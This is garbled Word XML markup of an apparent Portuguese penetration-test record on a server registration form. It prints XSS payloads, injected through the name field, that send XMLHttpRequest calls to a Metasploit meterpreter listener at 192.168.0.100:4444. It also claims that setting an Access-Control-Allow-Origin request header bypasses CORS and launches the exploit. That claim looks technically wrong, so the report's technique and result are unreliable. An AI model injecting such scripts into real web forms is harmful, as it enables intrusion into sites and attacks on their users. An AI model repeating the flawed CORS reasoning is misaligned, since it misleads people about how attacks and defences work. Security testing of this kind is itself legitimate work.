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Essa atividade representa a tarefa </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cadastro de Servidor - XSS.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Horário dos Testes: 1 hora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Horário Total: 1 hora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Tentar usar o campo de nome para incluir um script malicioso que consiga burlar o filtro CORS e realizar uma chamada a um listener do mestasploit para executar um ataque usando meterpreter.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Ferramenta: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Para os ataques abaixo, foi utilizado metasploit usando o exploit disponível em </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploits/multi/handler </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">e usando como payload, o script disponível em </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">windows/meterpreter/reverse_tcp.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Resultados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shd w:fill="eff0f1" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;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r = 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shd w:fill="eff0f1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shd w:fill="eff0f1" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XMLHttpRequest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(); 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r.open(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="4a1c21"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="eff0f1" w:val="clear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color w:val="1155cc"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:shd w:fill="eff0f1" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.0.100:4444’,false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r.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="505050"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:fill="e1e7ff" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">withCredentials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 = true;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6a737c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="eff0f1" w:val="clear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.send();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a737c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shd w:fill="eff0f1" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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685800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="XSS1.jpg" id="2" name="image03.jpg"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="XSS1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shd w:fill="eff0f1" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;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r = 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shd w:fill="eff0f1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shd w:fill="eff0f1" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XMLHttpRequest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(); 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r.open(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="4a1c21"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="eff0f1" w:val="clear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color w:val="1155cc"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:shd w:fill="eff0f1" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.0.100:4444’,false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r.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setRequestHeader(“</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="353528"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="fffaf6" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Access-Control-Allow-Origin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”,”*”);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6a737c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="eff0f1" w:val="clear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.send();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a737c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shd w:fill="eff0f1" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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requisição é bem sucedida e o Metasploit consegue iniciar o exploit.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120900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="XSS2.jpg" id="3" name="image05.jpg"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="XSS2.jpg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00450" cy="1323975"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="XSS3.jpg" id="1" name="image02.jpg"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="XSS3.jpg" id="0" name="image0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5.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image02.jpg"/></Relationships>
</file>